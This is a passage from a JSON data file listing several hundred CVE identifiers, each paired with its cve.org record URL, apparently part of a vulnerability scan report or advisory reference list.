"name": "CVE-2025-38710",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38710"
},
{
"name": "CVE-2026-2006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2006"
},
{
"name": "CVE-2023-28322",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28322"
},
{
"name": "CVE-2025-39681",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39681"
},
{
"name": "CVE-2025-1180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1180"
},
{
"name": "CVE-2025-38060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38060"
},
{
"name": "CVE-2025-40167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40167"
},
{
"name": "CVE-2025-38159",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38159"
},
{
"name": "CVE-2021-3421",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3421"
},
{
"name": "CVE-2025-38066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38066"
},
{
"name": "CVE-2025-4373",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4373"
},
{
"name": "CVE-2025-39770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39770"
},
{
"name": "CVE-2015-4790",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4790"
},
{
"name": "CVE-2026-0994",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0994"
},
{
"name": "CVE-2025-39969",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39969"
},
{
"name": "CVE-2025-37744",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37744"
},
{
"name": "CVE-2025-4598",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4598"
},
{
"name": "CVE-2025-38705",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38705"
},
{
"name": "CVE-2025-40194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40194"
},
{
"name": "CVE-2025-38706",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38706"
},
{
"name": "CVE-2025-38305",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38305"
},
{
"name": "CVE-2025-37884",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37884"
},
{
"name": "CVE-2025-38067",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38067"
},
{
"name": "CVE-2025-39750",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39750"
},
{
"name": "CVE-2025-38699",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38699"
},
{
"name": "CVE-2025-37927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37927"
},
{
"name": "CVE-2025-38707",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38707"
},
{
"name": "CVE-2025-38562",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38562"
},
{
"name": "CVE-2025-37897",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37897"
},
{
"name": "CVE-2016-9840",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-9840"
},
{
"name": "CVE-2025-37911",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37911"
},
{
"name": "CVE-2025-40245",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40245"
},
{
"name": "CVE-2025-38587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38587"
},
{
"name": "CVE-2023-6779",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6779"
},
{
"name": "CVE-2025-37869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37869"
},
{
"name": "CVE-2025-39692",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39692"
},
{
"name": "CVE-2025-5115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5115"
},
{
"name": "CVE-2023-53107",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53107"
},
{
"name": "CVE-2024-13009",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13009"
},
{
"name": "CVE-2022-49043",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49043"
},
{
"name": "CVE-2025-55198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55198"
},
{
"name": "CVE-2021-46195",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46195"
},
{
"name": "CVE-2015-2624",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2624"
},
{
"name": "CVE-2023-29491",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29491"
},
{
"name": "CVE-2025-38068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38068"
},
{
"name": "CVE-2025-38436",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38436"
},
{
"name": "CVE-2025-37930",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37930"
},
{
"name": "CVE-2025-38401",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38401"
},
{
"name": "CVE-2025-38677",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38677"
},
{
"name": "CVE-2025-38097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38097"
},
{
"name": "CVE-2021-20266",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20266"
},
{
"name": "CVE-2025-1182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1182"
},
{
"name": "CVE-2025-37810",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37810"
},
{
"name": "CVE-2025-38253",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38253"
},
{
"name": "CVE-2025-38123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38123"
},
{
"name": "CVE-2025-38338",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38338"
},
{
"name": "CVE-2025-38555",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38555"
},
{
"name": "CVE-2025-38239",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38239"
},
{
"name": "CVE-2025-1371",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1371"
},
{
"name": "CVE-2025-40001",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40001"
},
{
"name": "CVE-2022-40897",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40897"
},
{
"name": "CVE-2026-1485",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1485"
},
{
"name": "CVE-2025-0938",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0938"
},
{
"name": "CVE-2022-27782",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27782"
},
{
"name": "CVE-2008-0888",
"url": "https://www.cve.org/CVERecord?id=CVE-2008-0888"
},
{
"name": "CVE-2019-13232",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-13232"
},
{
"name": "CVE-2025-38590",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38590"
},
{
"name": "CVE-2025-38027",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38027"
},
{
"name": "CVE-2025-38102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38102"
},
{
"name": "CVE-2024-33600",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33600"
},
{
"name": "CVE-2015-2654",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2654"
},
{
"name": "CVE-2022-1210",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1210"
},
{
"name": "CVE-2025-40035",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40035"
},
{
"name": "CVE-2025-38283",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38283"
},
{
"name": "CVE-2023-25584",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25584"
},
{
"name": "CVE-2025-23159",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23159"
},
{
"name": "CVE-2025-39988",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39988"
},
{
"name": "CVE-2026-2005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2005"
},
{
"name": "CVE-2025-38455",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38455"
},
{
"name": "CVE-2015-4778",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4778"
},
{
"name": "CVE-2025-1152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1152"
},
{
"name": "CVE-2025-38584",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38584"
},
{
"name": "CVE-2025-38015",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38015"
},
{
"name": "CVE-2025-39675",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39675"
},
{
"name": "CVE-2025-39679",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39679"
},
{
"name": "CVE-2025-11082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11082"
},
{
"name": "CVE-2025-38527",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38527"
},
{
"name": "CVE-2025-38449",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38449"
},
{
"name": "CVE-2025-40233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40233"
},
{
"name": "CVE-2023-32636",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32636"
},
{
"name": "CVE-2025-37853",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37853"
},
{
"name": "CVE-2023-6277",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6277"
},
{
"name": "CVE-2025-38126",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38126"
},
{
"name": "CVE-2025-48060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48060"
},
{
"name": "CVE-2025-38149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38149"
},
{
"name": "CVE-2025-39763",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39763"
},
{
"name": "CVE-2025-38399",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38399"
},
{
"name": "CVE-2025-40020",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40020"
},
{
"name": "CVE-2025-38065",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38065"
},
{
"name": "CVE-2025-38693",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38693"
},
{
"name": "CVE-2025-38679",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38679"
},
{
"name": "CVE-2025-38459",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38459"
},
{
"name": "CVE-2025-40188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40188"
},
{
"name": "CVE-2025-38685",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38685"
},
{
"name": "CVE-2023-3618",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3618"
},
{
"name": "CVE-2025-38412",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38412"
},
{
"name": "CVE-2025-38031",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38031"
},
{
"name": "CVE-2023-4813",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4813"
},
{
"name": "CVE-2017-3617",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3617"
},
{
"name": "CVE-2025-14512",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14512"
},
{
"name": "CVE-2025-38293",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38293"
},
{
"name": "CVE-2025-58057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58057"
},
{
"name": "CVE-2025-1149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1149"
},
{
"name": "CVE-2025-38648",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38648"
},
{
"name": "CVE-2025-38278",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38278"
},
{
"name": "CVE-2025-8291",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8291"
},
{
"name": "CVE-2025-37764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37764"
},
{
"name": "CVE-2025-38184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38184"
},
{
"name": "CVE-2017-3615",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3615"
},
{
"name": "CVE-2022-44840",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-44840"
},
{
"name": "CVE-2023-28320",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28320"
},
{
"name": "CVE-2025-37741",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37741"
},
{
"name": "CVE-2026-22795",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22795"
},
{
"name": "CVE-2025-38053",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38053"
},
{
"name": "CVE-2025-27587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27587"
},
{
"name": "CVE-2026-0988",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0988"
},
{
"name": "CVE-2025-8534",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8534"
},
{
"name": "CVE-2025-37822",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37822"
},
{
"name": "CVE-2025-61727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61727"
},
{
"name": "CVE-2025-37912",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37912"
},
{
"name": "CVE-2025-38482",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38482"
},
{
"name": "CVE-2023-39810",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39810"
},
{
"name": "CVE-2025-37820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37820"
},
{
"name": "CVE-2025-37985",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37985"
},
{
"name": "CVE-2025-1390",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1390"
},
{
"name": "CVE-2024-33599",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33599"
},
{
"name": "CVE-2024-0743",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0743"
},
{
"name": "CVE-2025-38634",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38634"
},
{
"name": "CVE-2025-37787",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37787"
},
{
"name": "CVE-2026-21925",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21925"
},
{
"name": "CVE-2025-38008",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38008"
},
{
"name": "CVE-2025-38458",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38458"
},
{
"name": "CVE-2025-39730",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39730"
},
{
"name": "CVE-2025-38011",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38011"
},
{
"name": "CVE-2025-64718",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64718"
},
{
"name": "CVE-2022-50444",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50444"
},
{
"name": "CVE-2025-38034",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38034"
},
{
"name": "CVE-2017-3608",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3608"
},
{
"name": "CVE-2025-38135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38135"
},
{
"name": "CVE-2023-28484",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28484"
},
{
"name": "CVE-2025-38619",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38619"
},
{
"name": "CVE-2019-2708",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-2708"
},
{
"name": "CVE-2025-38312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38312"
},
{
"name": "CVE-2025-38095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38095"
},
{
"name": "CVE-2016-0692",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0692"
},
{
"name": "CVE-2025-37878",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37878"
},
{
"name": "CVE-2025-39737",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39737"
},
{
"name": "CVE-2025-38464",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38464"
},
{
"name": "CVE-2021-46174",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46174"
},
{
"name": "CVE-2026-0861",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0861"
},
{
"name": "CVE-2025-40049",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40049"
},
{
"name": "CVE-2023-0802",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0802"
},
{
"name": "CVE-2023-53164",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53164"
},
{
"name": "CVE-2025-47910",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47910"
},
{
"name": "CVE-2021-22924",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22924"
},
{
"name": "CVE-2023-47038",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-47038"
},
{
"name": "CVE-2025-38363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38363"
},
{
"name": "CVE-2025-38702",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38702"
},
{
"name": "CVE-2025-38319",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38319"
},
{
"name": "CVE-2020-10878",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10878"
},
{
"name": "CVE-2022-0529",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0529"
},
{
"name": "CVE-2015-4782",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4782"
},
{
"name": "CVE-2025-38724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38724"
},
{
"name": "CVE-2022-2056",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2056"
},
{
"name": "CVE-2023-26966",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26966"
},
{
"name": "CVE-2025-40070",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40070"
},
{
"name": "CVE-2025-38250",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38250"
},
{
"name": "CVE-2025-38457",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38457"
},
{
"name": "CVE-2025-38582",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38582"
},
{
"name": "CVE-2025-37813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37813"
},
{
"name": "CVE-2025-38543",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38543"
},
{
"name": "CVE-2025-38698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38698"
},
{
"name": "CVE-2025-38212",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38212"
},
{
"name": "CVE-2025-40106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40106"
},
{
"name": "CVE-2017-3610",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3610"
},
{
"name": "CVE-2025-38298",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38298"
},
{
"name": "CVE-2022-43552",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43552"
},
{
"name": "CVE-2025-5915",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5915"
},
{
"name": "CVE-2025-39739",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39739"
},
{
"name": "CVE-2022-48065",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48065"
},
{
"name": "CVE-2025-38024",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38024"
},
{
"name": "CVE-2025-38496",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38496"
},
{
"name": "CVE-2022-49063",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49063"
},
{
"name": "CVE-2025-5917",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5917"
},
{
"name": "CVE-2025-38078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38078"
},
{
"name": "CVE-2022-47696",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-47696"
},
{
"name": "CVE-2025-38419",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38419"
},
{
"name": "CVE-2024-45490",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45490"
},
{
"name": "CVE-2024-51744",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51744"
},
{
"name": "CVE-2025-38533",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38533"
},
{
"name": "CVE-2021-22947",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22947"
},
{
"name": "CVE-2025-40205",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40205"
},
{
"name": "CVE-2015-4788",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4788"
},
{
"name": "CVE-2025-38169",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38169"
},
{
"name": "CVE-2025-37931",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37931"
},
{
"name": "CVE-2025-38511",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38511"
},
{
"name": "CVE-2025-38537",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38537"
},
{
"name": "CVE-2025-38546",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38546"
},
{
"name": "CVE-2025-38211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38211"
},
{
"name": "CVE-2025-6965",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6965"
},
{
"name": "CVE-2023-28319",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28319"
},
{
"name": "CVE-2025-10966",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-10966"
},
{
"name": "CVE-2021-22922",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22922"
},
{
"name": "CVE-2025-38057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38057"
},
{
"name": "CVE-2024-45491",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45491"
},
{
"name": "CVE-2025-50182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50182"
},
{
"name": "CVE-2025-47906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47906"
},
{
"name": "CVE-2020-2981",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2981"
},
{
"name": "CVE-2025-37887",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37887"
},
{
"name": "CVE-2025-38077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38077"
},
{
"name": "CVE-2025-38251",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38251"
},
{
"name": "CVE-2022-22576",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22576"
},
{
"name": "CVE-2025-37861",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37861"
},
{
"name": "CVE-2025-38120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38120"
},
{
"name": "CVE-2025-38285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38285"
},
{
"name": "CVE-2025-39743",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39743"
},
{
"name": "CVE-2025-39718",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39718"
},
{
"name": "CVE-2025-37938",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37938"
},
{
"name": "CVE-2025-38005",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38005"
},
{
"name": "CVE-2025-38368",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38368"
},
{
"name": "CVE-2025-59375",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59375"
},
{
"name": "CVE-2025-31133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31133"
},
{
"name": "CVE-2022-35205",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-35205"
},
{
"name": "CVE-2025-8194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8194"
},
{
"name": "CVE-2025-38161",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38161"
},
{
"name": "CVE-2025-38331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38331"
},
{
"name": "CVE-2025-38354",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38354"
},
{
"name": "CVE-2016-3418",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-3418"
},
{
"name": "CVE-2025-38712",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38712"
},
{
"name": "CVE-2025-38732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38732"
},
{
"name": "CVE-2022-29824",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29824"
},
{
"name": "CVE-2025-39773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39773"
},
{
"name": "CVE-2024-11053",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11053"
},
{
"name": "CVE-2025-38696",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38696"
},
{
"name": "CVE-2024-7264",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7264"
},
{
"name": "CVE-2025-38274",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38274"
},
{
"name": "CVE-2025-40027",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40027"
},
{
"name": "CVE-2025-64505",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64505"
},
{
"name": "CVE-2025-39885",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39885"
},
{
"name": "CVE-2021-4214",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4214"
},
{
"name": "CVE-2025-50181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
},
{
"name": "CVE-2015-2656",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2656"
},
{
"name": "CVE-2025-37874",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37874"
},
{
"name": "CVE-2025-38115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38115"
},
{
"name": "CVE-2025-66382",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66382"
},
{
"name": "CVE-2025-38632",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38632"
},
{
"name": "CVE-2021-22946",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22946"
},
{
"name": "CVE-2023-0767",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0767"
},
{
"name": "CVE-2025-37988",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37988"
},
{
"name": "CVE-2025-1795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1795"
},
{
"name": "CVE-2025-23158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23158"
},
{
"name": "CVE-2017-3612",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3612"
},
{
"name": "CVE-2025-23144",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23144"
},
{
"name": "CVE-2025-38153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38153"
},
{
"name": "CVE-2025-37969",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37969"
},
{
"name": "CVE-2025-69421",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69421"
},
{
"name": "CVE-2025-38548",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38548"
},
{
"name": "CVE-2025-37816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37816"
},
{
"name": "CVE-2025-37742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37742"
},
{
"name": "CVE-2025-4517",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4517"
},
{
"name": "CVE-2025-58188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58188"
},
{
"name": "CVE-2025-37765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37765"
},
{
"name": "CVE-2016-9843",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-9843"
},
{
"name": "CVE-2025-1178",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1178"
},
{
"name": "CVE-2025-38395",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38395"
},
{
"name": "CVE-2025-37921",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37921"
},
{
"name": "CVE-2023-29499",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29499"
},
{
"name": "CVE-2025-38507",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38507"
},
{
"name": "CVE-2025-39989",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39989"
},
{
"name": "CVE-2025-38337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38337"
},
{
"name": "CVE-2025-38014",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38014"
},
{
"name": "CVE-2025-38258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38258"
},
{
"name": "CVE-2024-1013",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1013"
},
{
"name": "CVE-2025-37828",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37828"
},
{
"name": "CVE-2025-4674",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4674"
},
{
"name": "CVE-2025-30258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30258"
},
{
"name": "CVE-2025-1176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1176"
},
{
"name": "CVE-2025-37769",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37769"
},
{
"name": "CVE-2025-38465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38465"
},
{
"name": "CVE-2024-56406",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56406"
},
{
"name": "CVE-2025-38513",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38513"
},
{
"name": "CVE-2025-39970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39970"
},
{
"name": "CVE-2025-38086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38086"
},
{
"name": "CVE-2025-37935",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37935"
},
{
